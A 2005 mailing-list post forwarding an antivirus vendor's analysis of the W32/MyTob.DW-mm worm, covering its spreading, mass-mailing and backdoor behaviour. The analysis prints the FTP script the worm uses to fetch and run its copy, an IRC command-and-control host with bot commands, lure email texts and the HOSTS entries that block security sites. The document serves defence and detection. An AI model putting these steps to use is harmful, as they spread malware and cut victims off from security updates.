[LUG] W32/MyTob.DW-mm

Ronny Tue, 14 Jun 2005 00:29:47 -0700

Most attacked port 445  :-)  true?

http://www.fortinet.com/VirusEncyclopedia/search/encyclopediaSearch.do?method=viewVirusDetailsInfoDirectly&fid=56683<http://www.fortinet.com/VirusEncyclopedia/search/encyclopediaSearch.do?method=viewVirusDetailsInfoDirectly&fid=56683>


--
***************************************************************************
 / ''We can't become what we need to be by remaining what we are''\
 \ ,,                                                           ,,/
***************************************************************************

Title: W32/MyTob.DW-mm

W32/MyTob.DW-mm

at a glance

Virus Description Info

Description Last Updated:*

Jun 2 2005

Discovered In the Wild:*

May 25 2005

First Detected in FortiGate DB Version*

FOS/V2.36:	Current
FOS/V2.50:	Current
FOS/V2.80:	Current

Characteristics

Impact:*	1 2 3 4 5
Length:*	49,790
Class:*	Worm

Affects*

Pre-MS04-011 Security Patch

Systems offering TCP services

General MS-Windows

Known Alias(es)*

Net-Worm.Win32.Mytob.az [KAV], [EMAIL PROTECTED] [NAV], W32/Mytob-CM [Sophos], W32/MyTob.BF-mm, W32/[EMAIL PROTECTED] [McAfee], WORM_MYTOB.FC [Trend]

FortiGuard Center > Encyclopedia > Virus Definition

In-Depth Analysis

Visible Symptoms

Possible firewall alert that the file "nec.exe" is attempting to bind with TCP and function as a backdoor or server
Compromised systems are slow to respond due to heavy outbound traffic on TCP port 445 with other machines
Creation of these files on the infected system [note, the System32 folder may be in a different path depending on the version of Windows and user preferences] -

C:\WINNT\system32\nec.exe

Threat Analysis

This variant of MyTob is very similar to existing variants in that it is coded using Visual C, and contains instructions to spread to other systems using these methods -

SMTP email
networked systems
LSASS exploit [MS04-011]

The virus also has the following characteristics -

has a built-in FTP daemon with the reference name "StnyFtpd", and may serve the file "bingoo.exe" via the FTP daemon
blocks certain AV and security websites by altering the local "HOSTS" file

The virus borrows code from W32/Mydoom - this causes some AV scanners to identify this virus as a variant of the W32/Mydoom family.

Loading at Windows startup
If the threat is run manually, it will copy itself to the local system in several places -

C:\WINNT\system32\nec.exe

The virus has a file size in excess of 67,000 bytes. The virus will register itself to load at Windows startup -

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEMS" = nec.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEMS" = nec.exe

SMTP mass-mailing routine
The virus has instructions to send a copy of itself to contacts found in files of certain extensions. This virus appears to have borrowed the same harvest and exclusion routines as found in the W32/Mydoom virus family. Email addresses are sampled from files having these extensions -

The captured addresses are used as targets for the mailing routine. As with other viruses using this technique, the virus will avoid selecting email addresses containing certain strings, such as these -

-._!
-._!@
.edu
.gov
.mil
abuse
accoun
acketst
admin
anyone
arin.
avp
be_loyal:
berkeley
borlan
bsd
bugs
certific
contact
example
fcnz
feste
fido
foo.
fsf.
gnu
gold-certs
google
gov.
help
iana
ibm.com
icrosof
icrosoft
ietf
info
inpris
isc.o
isi.e
kernel
linux
listserv
math
mit.e
mozilla
mydomai
nobody
nodomai
noone
not
nothing
ntivi
page
panda
pgp
postmaster
privacy
rating
rfc-ed
ripe.
root
ruslis
samples
secur
sendmail
service
site
soft
somebody
someone
sopho
spm
submit
support
syma
tanford.e
the.bat
unix
usenet
utgers.ed
webmaster
www
you
your

The virus carries hard-coded message bodies and sends email with varying body text. The possible body text are selected from these choices -

Mail transaction failed. Partial message is available.
The message contains Unicode characters and has been sent as a binary attachment.
The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.
The original message was included as an attachment.
Here are your banks documents.

The email attachment may have a either a single or a double extension, based on this format -

filename.%1.%2

where %1 can be any of these -

doc
txt
htm
tmp

and %2 can be any of these -

exe
scr
pif
zip

The filename can be any of these -

body
data
doc
document
file
message
readme
test
text

Network spreading routine
The virus will first bind with a high TCP port such as 19713. The virus will spawn a thread that functions on this TCP port as an FTP server. The server responds with this detail, if connected to a logon instance -

220 StnyFtpd 0wns j0

When exiting the server, it responds with this string -

221 Goodbye happy r00ting.

Next, the virus will attempt to connect with systems on the same Class A subnet as the infected system. The virus generates random IP addresses based on the infected system IP address, and spans across randomly selected Class B and Class C addresses.

For example, if the infected system has an IP address of 192.168.29.56 [using network address translation, or NAT], the virus may try to connect with random addresses such as these -

192.168.1.71
192.168.113.2
192.168.44.50 and so on

The virus attempts to connect with the random system using TCP port 445. If a connection can be made, the virus uses an RPC exploit to gain access to the system. Once access is obtained, the virus generates an FTP script and writes it to the system with these instructions:

open %IP% %TCP port%
user hell rulez
binary
get bingoo.exe
quit

The virus then initiates FTP.EXE locally on the compromised system to retrieve a copy of the virus as "bingoo.exe" from the connecting system, and execute it.

Backdoor functionality
The virus will create a thread that functions as a backdoor, using TCP port 6667. The virus connects with the IRC server 'xtg.g3w.org' in order to receive instructions from a malicious user. Instructions include some of the following -

d66
.update
.raw
.exec
.rm
.dl_exec
.dl
.quit
.su
.dcomhack
.version
.uptime
.login

HOSTS modification routine
This variant alters the local "HOSTS" file in an effort to block access to Antivirus and security related web addresses. The virus overwrites the "HOSTS" file with misconfigured information so that attempts to reach certain addresses resolve to the IP 127.0.0.1, also known as "localhost". Below is a copy of a modified HOSTS file -

127.0.0.1 avp.com
127.0.0.1 ca.com
127.0.0.1 customer.symantec.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mast.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 nai.com
127.0.0.1 networkassociates.com
127.0.0.1 rads.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 sophos.com
127.0.0.1 symantec.com
127.0.0.1 trendmicro.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 viruslist.com
127.0.0.1 www.avp.com
127.0.0.1 www.ca.com
127.0.0.1 www.f-secure.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.mcafee.com
127.0.0.1 www.microsoft.com
127.0.0.1 www.my-etrust.com
127.0.0.1 www.nai.com
127.0.0.1 www.networkassociates.com
127.0.0.1 www.sophos.com
127.0.0.1 www.symantec.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.viruslist.com

Action

FortiGate systems:

check the main screen using the web interface to ensure the latest AV/NIDS database has been downloaded and installed -- if required, enable the "Allow Push Update" option

SITE MAP | LEGAL NOTICES

_______________________________________________
LUG mailing list
[email protected]
http://kym.net/mailman/listinfo/lug
%LUG is generously hosted by INFOCOM http://www.infocom.co.ug/

[LUG] W32/MyTob.DW-mm

Reply via email to